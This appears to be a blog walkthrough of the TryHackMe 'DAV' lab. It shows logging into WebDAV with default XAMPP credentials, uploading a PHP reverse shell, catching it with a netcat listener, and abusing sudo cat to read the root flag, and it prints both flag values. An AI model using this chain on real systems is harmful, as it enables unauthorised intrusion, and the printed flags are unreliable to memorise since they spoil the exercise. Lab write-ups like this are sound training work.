Knight Squad Blog

Tryhackme: DAV

Posted on by Shahabor Hossain Rifat

Hey everybody!
It’s Shahabor Hossain Rifat here.Today I’m going to show you how can you break into Dav tryhackme machine. So let’s get started.

First I simply scanned for all the ports using Nmap.

Port 80 is open so let’s access the website. There is an apache default page.

Let’s run gobuster against the website and see what we can find out.

I found a WebDAV accessible directory.

We need a username and password to access this directory, I did some Google searches and I found a blog article

http://xforeveryman.blogspot.com/2012/01/helper-webdav-xampp-173-default.html

I found that we can use ‘cadaver’ to access WebDAV . Let’s try to login by default credentials.

user: wampp
pass: xampp

We can now upload a PHP shell. I got a php reverse shell from pentestmonkey github

Link : https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php

Don’t forget to modify your IP and PORT in the PHP shell.


Do not forget to open an Netcat listener.

dav:/webdav/> PUT shell.php
Uploading shell.php to `/webdav/shell.php':
Progress: [=============================>] 100.0% of 193425 bytes succeeded.
dav:/webdav/> ls
Listing collection `/webdav/': succeeded.
        passwd.dav                            44  August 26  2019
        shell.php                         193425  October 12 12:10
❯ nc -nvlp 9999
Connection from 10.10.155.247:49024
Linux ubuntu 4.4.0-159-generic #187-Ubuntu SMP Thu Aug 1 16:28:06 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
 23:17:49 up 18 min,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$ cat /home/merlin/user.txt
449b40fe93f78a938523b7e4dcd66d2a

After a bit of enumeration. I run sudo -l command. We see that we can leverage cat to read the root flag because we can run it as root.

$ sudo -l 
Matching Defaults entries for www-data on ubuntu:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on ubuntu:
    (ALL) NOPASSWD: /bin/cat

It’s too easy

$ sudo cat /root/root.txt
101101ddc16b0cdf65ba0b8a7af7afa5

Yahoooooooo!

Hope you guys enjoyed this tryhackme Walkthrough.

1 thought on “Tryhackme: DAV

Leave a Reply

Your email address will not be published. Required fields are marked *